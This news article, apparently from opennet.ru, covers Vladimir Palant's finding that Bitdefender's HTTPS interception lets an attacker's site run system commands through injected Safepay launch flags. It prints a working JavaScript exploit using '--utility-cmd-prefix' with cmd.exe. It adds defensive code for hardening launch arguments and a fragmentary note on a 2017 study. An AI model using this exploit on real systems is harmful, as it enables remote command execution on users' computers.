Vladimir Palant, creator of Adblock Plus,
The cause of the problem is that the Bitdefender antivirus intercepts HTTPS traffic locally by replacing the site's original TLS certificate. An additional root certificate is installed on the client system, which makes it possible to hide the operation of the traffic inspection system in use. The antivirus inserts itself into protected traffic and injects its own JavaScript code into some pages to implement the Safe Search feature, and when there are problems with the certificate of a secure connection, it replaces the returned error page with its own. Because the new error page is served on behalf of the server being opened, other pages on that server have full access to the content inserted by Bitdefender.
When a site controlled by an attacker is opened, that site can send an XMLHttpRequest and simulate HTTPS certificate problems in the response, which causes Bitdefender to return its substituted error page. Because the error page is opened in the context of the attacker's domain, the attacker can read the contents of the substituted page, including the Bitdefender parameters. The page supplied by Bitdefender also contains a session key that makes it possible to use the internal Bitdefender API to launch a separate Safepay browser session, specify arbitrary command-line flags, and run any system command through the "--utility-cmd-prefix" flag. Example exploit (param1 and param2 are values obtained from the error page):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
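A mitigation for the flag injection described above, as an added example that is not from the original article or from Bitdefender: an untrusted URL is turned into browser launch arguments without letting it carry extra switches. The function names, the HTTPS-only allowlist and the assumption that the vulnerable launcher splits its input on spaces are illustrative; the sample input reuses the shape of the request body shown above with a placeholder value.

```javascript
// Added example, not Bitdefender code. Names and the https-only policy are
// assumptions made for illustration.
const ALLOWED_SCHEMES = new Set(["https:"]);

// Constructed sample: same shape as the request body above, placeholder value.
const SAMPLE = 'data:text/html,nada --utility-cmd-prefix="PLACEHOLDER"';

// Assumed vulnerable shape: untrusted text is split like a command line, so
// everything after the first space turns into extra browser switches.
function naiveBrowserArgs(untrusted) {
  return untrusted.split(" ");
}

// Hardened shape: parse, allowlist the scheme, re-serialize, and hand over
// exactly one argv element placed after the "--" switch terminator.
function safeBrowserArgs(untrusted) {
  if (typeof untrusted !== "string" || untrusted.length > 2048) {
    throw new Error("rejected: not a string or too long");
  }
  let url;
  try {
    url = new URL(untrusted);
  } catch {
    throw new Error("rejected: not an absolute URL");
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    throw new Error("rejected: scheme " + url.protocol);
  }
  const href = url.href; // the serializer percent-encodes spaces and quotes
  if (/[\s"]/.test(href)) {
    throw new Error("rejected: whitespace or quote after normalization");
  }
  return ["--", href]; // pass as an argv array, never as a shell string
}

// Shows which switches a launcher would see under each approach.
function compare(untrusted) {
  const isSwitch = (a) => a.startsWith("--") && a !== "--";
  let safe;
  try {
    safe = safeBrowserArgs(untrusted);
  } catch (e) {
    safe = e.message;
  }
  return { naiveSwitches: naiveBrowserArgs(untrusted).filter(isSwitch), safe };
}

console.log(compare(SAMPLE));
console.log(compare("https://example.com/a b --utility-cmd-prefix=x"));
```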
Recall that a study conducted in 2017
Only 11 of the 26 products offered up-to-date cipher suites. 5 systems did not verify certificates (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security and Total Security products were susceptible to attack
Source: opennet.ru